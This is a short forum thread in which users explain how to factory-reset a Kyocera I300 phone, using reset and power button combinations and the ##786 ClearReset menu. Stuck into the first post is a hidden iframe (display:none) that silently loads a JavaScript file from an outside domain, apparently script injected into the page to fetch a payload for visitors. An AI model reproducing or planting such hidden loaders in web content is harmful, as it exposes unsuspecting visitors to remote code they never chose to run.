Question I300 Back to Factory Settings

Is there a quick way to completely erase an I300, to where it is in the same state as it is brand new out of the box? Or do you have to uninstall everything individually? :s<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I thought that by pressing the reset button and then power button at the same time and then releasing the reset first followed by the power it would erase everything back to factory...or am I wrong?

That's the way...hold down power button and press reset. It will ask if you want to erase all data. Just hit the up button and you're phone is reincarnated (minus all your data, contacts, and other useful information).

Can't wait for a phone with a flashcard slot.

didnt you have to do something like press in the reset, hold it, press and hold the up (or down?) button on the face of the unit, THEN release the reset button, wait a few seconds, then release the up/down button? ... or was i just dreaming again

Clint -- How reset do you want your I300?

To reset the handset entirely (requires re-programming), enter ##786 on the keypad. An Air Time screen will appear. In the lower-left corner, there will be a button labeled ClearReset. Tap this and a dialog box will appear saying 'Delete all data. Will you reset to factory default?' Tap OK. At this point you may or may not be prompted for the MSL code. (I do not want to actually do this on mine ) When you do this, you will have to re-program the handset in order for it to work as a phone.

Cheers!
Dave
